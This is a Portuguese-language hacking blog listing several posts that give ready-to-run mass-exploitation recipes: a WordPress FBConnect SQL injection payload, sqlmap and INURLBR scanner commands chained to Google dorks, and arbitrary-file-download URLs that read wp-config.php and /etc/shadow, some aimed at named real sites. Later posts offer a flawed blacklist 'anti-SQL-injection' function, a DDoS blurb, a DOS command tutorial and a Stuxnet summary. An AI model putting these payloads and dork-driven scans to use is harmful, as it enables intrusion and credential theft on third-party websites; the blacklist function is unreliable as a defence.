Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador video. Mostrar todas as postagens
Mostrando postagens com marcador video. Mostrar todas as postagens

quinta-feira, 7 de maio de 2015

WordPress FBConnect SQL Injection Vulnerability + INURLBR VALIDATING HTML RETURN

[ + ] INURLBR 2.1
[ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN
[ + ] WORDPRESS:  Fbconnect
[ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1
[ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0
exec: fbconnect_action=myhome&fbuserid=1 + xpl

[ + ] INURLBR 2.1 [ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN [ + ] WORDPRESS:  Fbconnect [ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1 [ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0 exec: fbconnect_action=myhome&fbuserid=1 + xpl


  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # EA:            http://www.exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil

[ + ] SEARCH DORK
--dork 'inurl:"?fbconnect_action="' 
---------------------------------------------------------------------------

[ + OUTPUT VULN
-s sqli.txt  
---------------------------------------------------------------------------

[ + ID SEARCH ENGINES 1 = GOOGLE + CSE, 6 GOOGLE API
-q 1,6 
---------------------------------------------------------------------------

[ + EXPLOIT GET
--exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0'
---------------------------------------------------------------------------

[ + TYPE INTERNAL VALIDATION
-t 2 
---------------------------------------------------------------------------

[ + SEARCH FOR CUSTOM VALUE
-a 'xpl_success' 
---------------------------------------------------------------------------

[ + FILTER HOSTS URL / MOD UNIQUE = HOST+XPL_GET
--unique
---------------------------------------------------------------------------

[ + ] CONVERTED VALUE
0x78706c5f73756363657373 = hex(xpl_success)
---------------------------------------------------------------------------

- We pass the value (hexdecimal)-'0x78706c5f73756363657373' in our sql injection.

Se a string 'xpl_success' aparecer no retorno html do nosso alvo, Significa que foi explorado com sucesso.
If the string 'xpl_success' appears on the html return of our target, it means that was successfully exploited.


Resumindo eu passo um valor pré-definido na minha injeção sql em formato hexdecimal no select ,caso tal valor retorne no formato string significa que foi executado com sucesso.
No tutorial converti a string xpl_success para hexadecimal que fica 78706c5f73756363657373, injeto no server ele executa e prita pro cliente.
No script INURLBR o parâmetro -t level 2 é pra ser validado com uma busca personalizada dentro do alvo, quando quero achar uma determinada string por isso usamos o comando -a complementando, -t 2 anula a busca de outros erros SQLI  e vai focar somente em nossa string passada através -a 'sua_string'.



if(HTML == xpl_success){ OK }


[ + ] COMMAND:
php inurlbrpriv8.php  --dork 'inurl:"?fbconnect_action="' -s sqli.txt -q 1,6 --exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0' -t 2 -a 'xpl_success' --unique

[ + ] VÍDEO:


DOWNLOAD SCANNER: 
https://github.com/googleinurl/SCANNER-INURLBR


REF
http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html
http://www.1337day.com/exploit/15790

terça-feira, 17 de março de 2015

MINI EXPLOIT: Joomla Simple Photo Gallery - SQL injection + VIDEO

Usando miniexploit para explorar em massa vários alvos.

Usando miniexploit para explorar em massa vários alvos. Title: Joomla Simple Photo Gallery - SQL injection Date : 13-03-2015 Vendor Homepage: https://www.apptha.com/ Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery Version : 1 Tested on : sqlmap

Title: Joomla Simple Photo Gallery - SQL injection
Date : 13-03-2015
Vendor Homepage: https://www.apptha.com/
Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
Version : 1
Tested on : sqlmap

POC:
http://{$target}/index.php?option=com_simplephotogallery&view=images&albumid=[SQLI]

Comando SQLMAP de exploração:
sqlmap  -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba

DORK de pesquisa:
Dork Google 1: inurl:/com_simplephotogallery site:com
Dork Google 2: inurl:/com_simplephotogallery site:org
Dork Google 3: inurl:/com_simplephotogallery site:fr
Dork Google 4: inurl:/com_simplephotogallery/


Agora vamos organizar nosso comando INURLBR  para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.

 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
Parâmetro organizado:
--dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/'

Baixar MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection: 
http://pastebin.com/Gb5uhPKW
File: miniexploit.php

Baixar scanner INURLBR 1.0:
https://github.com/googleinurl/SCANNER-INURLBR
File: inurlbr.php


Executando:
./inurlbr.php --dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/' -s save.txt -q 1,6 --command-all "php miniexploit2.php '_TARGET_'"

domingo, 18 de janeiro de 2015

Arbitrary File Download vulnerability no tema Bretheon do wordpress


Arbitrary File Download vulnerability o que eu chamo de A.F.D.
Foi encontrada tal falha no tema Bretheon do wordpress.
--------------------------------------------------------------------------------------------------------------
DETALHES Acesso: http://1337day.com/exploit/23140 Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability Date: 17/01/2014 Exploit Author: MindCracker - Team MaDLeeTs Contact : Md5@live.com.pk - Maddy@live.com.pk| https://twitter.com/MindCrackerKhan  Tested on: Linux / Window  Google Dork: inurl:wp-content/themes/bretheon/ Demo  http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php   PoC  http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


DETALHES
Acesso: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : [email protected] - [email protected]| https://twitter.com/MindCrackerKhan 
Tested on: Linux / Window

Google Dork: inurl:wp-content/themes/bretheon/
Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
--------------------------------------------------------------------------------------------------------------

Como tal falha no tema não usa nada de novo e o caminho padrão "admin-ajax.php?action=revslider_show_image&img="  nosso exploit desenvolvido meses atrás já faz tal verificação e pode ser usado tranquilamente.
--------------------------------------------------------------------------------------------------------------

[TUTORIAL]: 

https://www.youtube.com/watch?v=w6pxPR_s05w

TUTORIAL DETALHES:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html

EXECUTE:
php exploit.php www.target.gov.us
--------------------------------------------------------------------------------------------------------------

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
--------------------------------------------------------------------------------------------------------------

terça-feira, 23 de dezembro de 2014

Tutorial/Video EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

TUTORIAL ::: E X P L O I T 

$MASS_EXPLOIT = ($Script_Exploit +  $SCANNER_INURLBR);

EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

--------------------------------------------------------------------------------------------------------------
# NAME:::::::: Wordpress A.F.D Theme Echelon
# TIPE:::::::: Arbitrary File Download

# Google DORK: inurl:/wp-content/themes/echelon
# Vendor:::::: www.wordpress.org
# Tested on::: Linux

# EXECUTE::::: php exploit.php www.alvo.com.br
# OUTPUT:::::: EXPLOIT_WPAFD_Echelon.txt
--------------------------------------------------------------------------------------------------------------

EXPLOIT::: 
DOWNLOAD::
LINK[0]::: http://pastebin.com/14uVQyUV
LINK[1]::: http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
--------------------------------------------------------------------------------------------------------------

USE::::::: MASS / USE SCANNER INURLBR
DOWNLOAD::
LINK[0]::: https://github.com/googleinurl/SCANNER-INURLBR
--------------------------------------------------------------------------------------------------------------

COMAND EXEC SCANNER INURLBR / comando de uso....
./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --command-all "php exploit.php _TARGET_"
--------------------------------------------------------------------------------------------------------------

Arquivos que o EXPLOIT verifica::

File download /etc/passwd & /etc/shadow

Failure consists of exploring a parameter $ _POST file

{alvo_target}/wp-content/themes/echelon/lib/scripts/dl-skin.php

The following fields are exploited for Arbitrary File Download
*REQUEST POST:*
_mysite_download_skin={$config['file']}&submit=Download 
ex:
 _mysite_download_skin=/etc/passwd&submit=Download

[Vídeo]
#-------------------------------------------------------------------
# AUTOR:        GoogleINURL
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE:  https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#-------------------------------------------------------------------



quinta-feira, 4 de setembro de 2014

FALHA! Injeção de SQL em vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 e 5.1.2 (Exploit + Vídeo)

vBulletin é um software desenvolvido por vBulletin Solutions, para a criação e manutenção de fóruns na Internet. Ele é baseado em PHP e MySQL e segundo a empresa mais de 100.000 sites funcionam sob este sistema.



vBulletin é um software desenvolvido por vBulletin Solutions, para a criação e manutenção de fóruns na Internet. Ele é baseado em PHP e MySQL e segundo a empresa mais de 100.000 sites funcionam sob este sistema.

Segundo vBulletin que confirma o problema afeta as versões 5.0.4, 5.0.5, 5.1.0, 5.1.1 e 5.1.2. O grupo romeno Romanian Security Team (RST) postou um vídeo que mostra a vulnerabilidade e confirma o relatório para vBulletin, que irá fornecer todos os detalhes após o lançamento do patch.

A vulnerabilidade permite que um atacante realize ataques de injeção SQL no banco de dados, com todas as implicações que isso pode trazer. Ou seja, extrair todas as informações e conteúdo do banco de dados, e até mesmo de lá comprometer todo o sistema.

Tal façanha foi publicado e nos permite obter a versão, nome de usuário e banco de dados para obter detalhes mais suculentos deve modificar o exploit:

Vídeo demostrativo=>




Usando exploit=> http://pastebin.com/hb2adMn6
php exploit.php {target}
Ex: php exploit.php http://forum.teste.com.br

DORK[0]=> "Powered by vBulletin® Version 5.1.2"
DORK[1]=> "Powered by vBulletin® Version 5.0.4"
DORK[2]=> "Powered by vBulletin® Version 5.0.5"
DORK[3]=> "Powered by vBulletin® Version 5.1.0"
DORK[4]=> "Powered by vBulletin® Version 5.1.1"
DORK[5]=> site:com intext:"5.0.4" & "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org


Com base no exploit feito pela Romanian Security Team fizemos o nosso voltado para o ferramenta INURLBR, tal exploit será disponibilizado junto com próxima versão do scanner, mas nada impede de usar com o scan script feito pela (RST).

Comando INURLBR=>
./inurlbr.php --dork 'site:com intext:"5.0.4" "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org -site:forumrunner.com' -s vBulletin.txt -q 6 -t 1 --comand-all 'php exploitvBulltin.php http://_TARGET_'

Demostrativo=>
Com base no exploit feito pela Romanian Security Team fizemos o nosso voltado para o scanner INURLBR, tal exploit será disponibilizado junto com próxima versão do scanner.


Fontes=>{

[+] http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html
[+] http://unaaldia.hispasec.com/2014/07/inyeccion-sql-en-el-gestor-de-foros.html
[+] http://packetstormsecurity.com/files/127537/vBulletin-5.1.2-SQL-Injection.html
[+] http://1337day.com/exploits/22452

}

domingo, 2 de setembro de 2012

Defenda-se do SQL injection Script

Defenda-se do SQL injection Script

Hoje com a grande necessita que o mercado tem de ficar online, até o tio da quitanda da esquina tem um website.
Mais com grande numero de profissionais e de trabalhos que existe vem a questão de segurança seu site é seguro?

As vezes me deparo com situações no de fato ridículas referente valorização do Professional.
Digamos Tem dois profissionais que trabalham com Webdesign:

1º Profissional -  Te garante Segurança no script,SEO,Administração do site.
       Entrega com prazo de 10 a 15 dias depois que o conteudo entregue.
       Valor: 1,500.
2º Profissional -  SEO,Administração do site.
        Entrega com prazo de 5 a 8 dias depois que o conteudo entregue.
       Valor: 800,50.

Logica: "Logo o cliente pensa pra que eu quero segurança no meu site, não preciso disso tudo sem falar que o preço do n2 ta melhor."

Informando "NÃO SEJA ESSE CARA"!
Da mesma forma que temos informações de como fazer uma receita de bolo na internet, podemos ter informações de como invadir seu site em questões de clicks.

Um vídeo abaixa demonstra bem o que é um simples invasão.
O video se trata de Blind SQL injection no final do post tem o link de um tutorial como se defender dele.

Tutorial Blind SQL Injection - 2012




Script Ant - SQL_Injection


Recomento ler essa matéria também  tutorial.
Fonte do vídeo:http://www.lucaspeperaio.com.br/blog/blind-sql-injection

sexta-feira, 3 de fevereiro de 2012

Audiência Pública Sobre o Pinheirinho - Defensor Jairo Salvador

Passem para frente esse vídeo porque na TV não sera exibido.
Passem para frente esse vídeo porque na TV não sera exibido.






Espero que vocês assistam e divulguem, as vezes é ate desanimador postar essas coisas mais serias, pois na maioria dos casos esses posts de assuntos "mais sérios" geram 20 curtidas e 20 compartilhamentos, numa pagina que tem quase 7 mil pessoas é pouco e não deixa de ser um descaso, pois é necessário levar esse tipo de informação... Não somos uma pagina de humor!! Apesar de infelizmente sermos palhaços do Sarney e companhia...

quinta-feira, 7 de abril de 2011

quarta-feira, 6 de abril de 2011

Video ASP injection demostração

Video aula com demonstrando um ataque  ASP injection feito pelo hacker NoxXxoN





Função que previne ataque a sites utilizando SQL Injection.

Para quem não sabe SQL Injection é uma falha de programação comumente cometida entre desenvolvedores que estão começando a desenvolver sistemas e não têm uma noção muito boa sobre segurança.

Essa falha permite que o atacante faça login como administrador sem nem saber o nome do usuário ou sua senha, permite que se insiram dados nas tabelas utilizadas pelo site ou até que se delete completamente uma tabela ou banco de dados de um site sem nem mesmo precisar fazer o login.

'CODIGO:
function LimparTexto(str)
str = trim(str)
str = lcase(str)
str = replace(str,"=","")
str = replace(str,"'","")
str = replace(str,"""""","")
str = replace(str," or ","")
str = replace(str," and ","")
str = replace(str,"(","")
str = replace(str,")","")
str = replace(str,"<","[") str = replace(str,">","]")
str = replace(str,"update","")
str = replace(str,"-shutdown","")
str = replace(str,"--","")
str = replace(str,"'","")
str = replace(str,"#","")
str = replace(str,"$","")
str = replace(str,"%","")
str = replace(str,"¨","")
str = replace(str,"&","")
str = replace(str,"'or'1'='1'","")
str = replace(str,"--","")
str = replace(str,"insert","")
str = replace(str,"drop","")
str = replace(str,"delet","")
str = replace(str,"xp_","")
str = replace(str,"select","")
str = replace(str,"*","")
LimparTexto = str
end function

'----------------------------------[ Para usar a função] ------------------------------------
$login = LimparTexto($_POST["login"])
$senha = LimparTexto($_POST["senha"])

Fonte do video:http://www.youtube.com/watch?v=cyHYZVaKRqI&feature=mfu_in_order&list=UL
Autor: NoxXxoN

Fonte do codigo protetor de tela de login a sql injectiton:
http://codigofonte.uol.com.br/codigo/asp/seguranca/funcao-para-evitar-sql-injection
Autor: Rodrigo Araujo

Criar um rooter de windows em php

Video aula feita por: NoxXxoN.
Esse video tem como objetivo ensinar voce a criar um rooter de windows em php.






1. Diferenças entre comandos internos e externos
Os comandos internos podem ser executados em qualquer pasta no PC e a qualquer momento pois estão embutidos no DOS. Os comandos externos são programas utilitários que acompanham o sistema operacional e que só podem ser executados onde estão localizados, ou seja, no drive onde foram gravados. Este tutorial está dividido em 2 partes: comandos internos e comandos externos.
2. Os comandos internos
Nos comandos internos pode-se saber mais informações acerca do mesmo, digitando /? após o comando, ex.: dir/?, você irá receber informações sobre o comando dir, os comandos internos são os mais úteis em emergências já que podem ser executados em qualquer lugar; agora, vamos aos comandos.
Comando DATE
Esse comando, como o nome já diz, mostra na tela a data atual, permitindo a sua modificação. O comando DATE deverá ser usado da seguinte maneira: date [opções] (Sem os colchetes), sendo que não é necessária a utilização das opções caso você não queira.
Ex.: Digitando date, irá aparecer:
Data atual: sáb 28/06/2003
Digite a nova data: (dd-mm-aa)

Opções:
/t - Informa a data mas não solicita uma nova.
Comando TIME
Esse comando faz a mesma coisa que o comando DATE mas ao invés de mudar a data ele muda a hora: esse comando mostra hora, minutos, segundos e centésimos de segundo. O comando TIME deverá ser usado da seguinte maneira: Time [opções] (Sem os colchetes), sendo que não é necessária a utilização das opções caso você não queira.
Ex.: Digitando time, irá aparecer:
Hora Atual: 17:01:20,98
Digite a nova Hora:

Opções:
/t – Informa a hora mas não solicita uma nova.
Comando VER
Esse comando mostra qual sistema operacional você está usando.
Ex.: Digitando ver, irá aparecer:
Microsoft Windows XP [versão 5.1.2600]
Comando CLS
Esse comando limpa a tela e posiciona o cursor no canto superior esquerdo da tela.
Comando Dir
O comando dir é muito famoso e quase todos já conhecem: ele mostra todos arquivos e pastas de um diretório e busca arquivos em um drive especificado. O comando DIR é usado da seguinte maneira: dir [drive:\][caminho\] arquivo(s) [opções] (Sem os colchetes) sendo que não é necessária a utilização das opções caso você não queira nem de arquivo(s).
Opções:
/p - A listagem pára toda vez que atinge o fim da tela, sendo necessário que se pressione qualquer tecla para continuar.
/b – Mostra somente as informações básicas.
/c – Mostra o separador de milhar no tamanho dos arquivos.
/w – Exibe a lista na horizontal, onde são mostrados 5 arquivos por linha.
/d – O mesmo que /w, só que mostra a lista em colunas.
/s – Exibe os arquivos de todos os subdiretórios.
/l – Usa letras minúsculas.
/n – Formato de lista longa em que os nomes dos arquivos ficam na extrema direita.
/q - Mostra o nome do dono do arquivo.
/4 – Exibe anos de 4 dígitos.
/t:campo – Controla qual campo de tempo é exibido ou usado na classificação onde campo deve ser substituído por um desses caracteres e não devem ser digitados os 2 pontos (:).
C – Criação.
A – Último acesso.
W – Última gravação.
/o:ordem – Mostra os arquivos em uma ordem, onde ordem deve ser substituída por um desses caracteres e não devem ser digitados os 2 pontos (:).
N – Nome do arquivo seguido pela extensão.
S - Tamanho do arquivo.
D – Ordem cronológica.
G – Grupos de arquivos de subdiretórios.
/a:atributo - Mostra somente arquivos de determinado atributo, onde atributo deve ser substituído por algum desses caracteres e não devem ser digitados os 2 pontos (:).
D – Nome do arquivo seguido pela extensão.
R – Arquivos somente leitura.
H - Arquivos ocultos .
Obs.: Para reverter o efeito dos caracteres, é necessário a colocação de um hífen (-)
Ex.: Dir /a-h, mostra todos os arquivos menos os arquivos ocultos.
Comando COPY
O comando COPY copia um determinado arquivo ou o disco inteiro, sendo que caso exista algum arquivo no destino com o mesmo nome do arquivo de origem, esse arquivo será substituído. O COPY deve ser usado da seguinte maneira: copy [drive:\][caminho\] arquivo(s) de destino [opções] (Sem colchetes), sendo que não é necessária a utilização das opções caso você não queira.
Opções:
/v – Verifica o arquivo de destino após a cópia, esta opção deixa o copy mais lento.
/a - Indica um arquivo de texto ASCII.
/b - Indica um arquivo binário.
/d - Permite que o arquivo de destino seja criado descriptografado.
/n – Usa um nome de arquivo curto (Padrão 8.3), caso copie um arquivo fora deste padrão.
/y – Não pede confirmação para que você substitua um arquivo de destino já existente.
/-y – Pede confirmação para que você substitua um arquivo de destino já existente.
/z – Copia arquivos de rede no modo reiniciável.
Comando TYPE
Mostra o conteúdo de um arquivo (somente um por vez e não aceita caracteres curinga).
Comando REN ou RENAME
Renomeia o arquivo. Pode-se também alterar a extensão do mesmo.
Ex.: Ren Arquivo.txt Backup.bak, Isto renomeia o arquivo: Arquivo.txt, para Backup.bak.
Comando DEL ou ERASE
Apaga arquivos do disco rígido e deve ser usado da seguinte maneira: del [drive:\][caminho\] nome do(s) arquivo(s) [opções] (Sem colchetes), sendo que não é necessária a utilização das opções caso você não queira.
Opções:
/p - Força a mensagem de confirmação “Apagar( S / N )?”.
/f – Força a exclusão de arquivos somente leitura.
/s – Exclui arquivos de todas as subpastas.
/q – Modo silencioso, não pede confirmação para excluir um caractere curinga global.
/a:atributo – Exclui somente arquivos de determinado atributo, onde atributo deve ser substituído por algum desses caracteres e não devem ser digitados os 2 pontos (:).
S – Arquivos de sistema.
R – Arquivos somente leitura.
H – Arquivos ocultos.
A - Arquivos prontos para arquivamento.
Obs.: Para reverter o efeito dos caracteres, é necessário a colocação de um hífen (-).
Ex.: Del *.* /a-h, executando este comando, você exclui todos os arquivos menos os arquivos ocultos da pasta.
Comando MD ou MKDIR
Cria uma pasta, devendo ser usado da seguinte maneira: MD Pasta, onde Pasta é o nome da pasta que você quer criar.
Comando CD ou CHDIR
Entra ou sai de uma pasta: se você digitar CD TESTE, por exemplo, ele entrará na pasta TESTE. Se você digitar CD.. ele irá voltar para a pasta anterior. O mesmo vale para o CHDIR.
Comando RD ou RMDIR
Remove uma pasta que esteja vazia, sendo que não consegue remover pastas com arquivos. Deve ser usado da seguinte maneira: rd [opções] (Sem colchetes), sendo que não é necessária a utilização das opções caso você não queira.
Ex.: Digitando RD Teste você irá excluir a pasta teste.
Opções:
/s - Remove todas as pastas e arquivos da pasta, além dela mesma.
/q – Modo silencioso, não pede confirmação para remover a árvore de pastas quando usado com /s.
2. Os comandos externos
Assim como nos comandos internos pode-se usar o comando auxiliar /?, dentre os comandos externos, alguns são muito úteis, como o format veremos logo adiante…
Comando ATTRIB
O Attrib altera ou mostra os atributos de um arquivo, devendo ser usado da seguinte maneira: attrib [Atributo] [drive:\][caminho\] nome do(s) arquivo(s) [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções do “Atributo” dos colchetes:
+ Ativa um atributo.
- Desativa um atributo.
r – Atributo de arquivo somente leitura.
a – Atributo de arquivo de leitura/gravação.
s – Atributo de arquivo de sistema.
h – Atributo de arquivo oculto.
Opções:
/s - Processa os arquivos da pasta atual.
/d – Inclui pastas.
Comando FORMAT
Como o nome já diz, ele formata o drive. Deve ser usado da seguinte maneira: format [drive:] [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/fs:sistema de arquivos – Formata a partição como fat32, fat ou ntfs, é necessário substituir “sistema de arquivos”, por fat32, fat ou ntfs.
/v:nome – Formata a partição com um nome de volume específico.
/q – Formatação rápida (Tão rápida quanto a formatação de um disquete).
/c – Arquivos criados na partição serão compactados (somente com partições ntfs).
/x - Força primeiro a desmontagem do volume, se necessário. Todos os identificadores abertos no volume não seriam mais válidos.
/f:tamanho – Especifica o tamanho do disquete a ser formatado (Em formatações de disquete, claro).
/t:trilhas – Especifica o número de trilhas por lado do disco.
/n:setores – Especifica o número de setores por trilha.
Comando DISKCOPY
O comando DISKCOPY copia o conteúdo de um disco flexível para outro, sendo que eles devem ter o mesmo tamanho e densidade. Deve ser usado da seguinte maneira: diskcopy [drive de origem:] [drive de destino:] [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/v - Verifica os arquivos copiados após a cópia.
Comando XCOPY
O comando xcopy copia arquivos de um ou mais subdiretórios. Também pode copiar os subdiretórios, mas não copia arquivos de sistema ou ocultos, devendo ser usado da seguinte maneira: xcopy [drive:\][caminho\] arquivo(s) de destino [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/d – Copia arquivos que foram modificados a partir de uma certa data.
/p – Pede confirmação para cópia de cada arquivo.
/s – Copia diretórios e subdiretórios (Não copia pastas vazias).
/e/s – Copia os subdiretórios mesmo que estejam vazios.
/v - Verifica os arquivos copiados.
Obs.: Por ser um comando com inúmeras opções não é possível que eu escreva todas aqui. Para saber mais sobre o xcopy, vá no prompt de comando e digite xcopy /?
Comando TREE
O comando tree mostra as pastas e subpastas da pasta onde foi executado o comando. Parece complicado mas não é: é como a parte esquerda do Windows Explorer. Deve ser usado da seguinte maneira: tree [drive:\][caminho\][opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/f - Inclui nome dos arquivos de cada subdiretório.
/a - Exibe os subdiretórios com caracteres ASCII.
Comando DELTREE
É a combinação dos comandos del e tree: ele exclui arquivos de uma pasta suas subpastas e “subarquivos”. Deve ser usado da seguinte maneira: deltree [opções][drive:\][caminho\] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/y – Não pede confirmação para a exclusão dos arquivos.
Comando MOVE
O comando move altera a posição de um ou mais arquivos de uma pasta para outra. Deve ser usado da seguinte maneira: move [opções] [drive:\][caminho\]arquivo1,arquivo2 (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/y - Não pede confirmação para a mudança dos arquivos.
/-y – Pede confirmação para mudança dos arquivos.
Para Renomear diretórios
Use [opções] [drive:\][caminho\]nome do diretório antigo [drive:\][caminho\]nome do diretório novo
3. Dicas
A. Nos comandos acima é possível a utilização de caracteres curinga como “*.*” (asterisco ponto asterisco), que significa todos os arquivos ,”relatorio.*“, que significa arquivos de nome relatorio com qualquer extensão, “*.txt“, significa qualquer arquivo com extensão .txt, “foto?.bmp“, que significa qualquer arquivo que comece com a palavra “foto” e tenha extensão .bmp
Resumindo, o asterisco (*) significa qualquer caracteres de qualquer tipo e interrogação (?) significa um caractere qualquer. Estes são chamados caracteres curingas e são muito úteis no MS-DOS.
B. Um comando que adoro digitar no Autoexec.bat é o deltree, eu digito a seguinte linha: deltree /y c:\windows\temp\. Se você leu atentamente o tutorial saberá que este comando serve para limpar a pasta temp do Windows toda vez que ele for iniciado, e para quem odeia o menu Documentos Recentes do menu Iniciar digite no autoexec.bat: deltree /y c:\windows\recent\ … 

Fonte do video:http://www.youtube.com/embed/sei0WRU9_68
Autor: NoxXxoN

Fonte do texto: http://www.invasaohacking.com/2010/05/13/comandos-do-ms-dos-prompt-de-comando/
Autor: Nuclear Boy

segunda-feira, 4 de abril de 2011

Sophia Hacker Group: ATACK DDOS!

[-Sophia Hacker Group-]
 Derrubando sites com ddos em php , feito pelo hacker: Alternative
 ATACK DDOS!:
Um ataque de negação de serviço (também conhecido como DoS, um acrônimo em inglês para Denial of Service), é uma tentativa em tornar os recursos de um sistema indisponíveis para seus utilizadores. Alvos típicos são servidores web, e o ataque tenta tornar as páginas hospedadas indisponíveis na WWW. Não se trata de uma invasão do sistema, mas sim da sua invalidação por sobrecarga. Os ataques de negação de serviço são feitos geralmente de duas formas:
  • Forçar o sistema vítima a reinicializar ou consumir todos os recursos (como memória ou processamento por exemplo) de forma que ele não pode mais fornecer seu serviço.
  • Obstruir a mídia de comunicação entre os utilizadores e o sistema vítima de forma a não comunicarem-se adequadamente.

segunda-feira, 14 de fevereiro de 2011

Stuxnet – O vírus mais poderoso do mundo

Stuxnet – O vírus mais poderoso do mundo

Stuxnet é um worm de computador projetado especificamente para atacar o sistema operacional SCADA, desenvolvido pela Siemens para controlar as centrífugas de enriquecimento de urânio iranianas. Foi descoberto em junho de 2010 pela empresa bielorrussa desenvolvedora de antivírus VirusBlokAda. É o primeiro worm descoberto que espiona e reprograma sistemas industriais.[1] Ele foi especificamente escrito para atacar o sistema de controle industrial SCADA, usado para controlar e monitorar processos industriais.[2] O Stuxnet é capaz de reprogramar CLPs e esconder as mudanças.[3] O vírus pode estar camuflado em mais de 100 mil computadores, porém, para sistemas operacionais domésticos como o Windows e Mac OS X, o worm é inofensivo, só funciona efetivamente nas centrífugas de enriquecimento de urânio iranianas, já que cada usina possui sua própria configuração do sistema SCADA.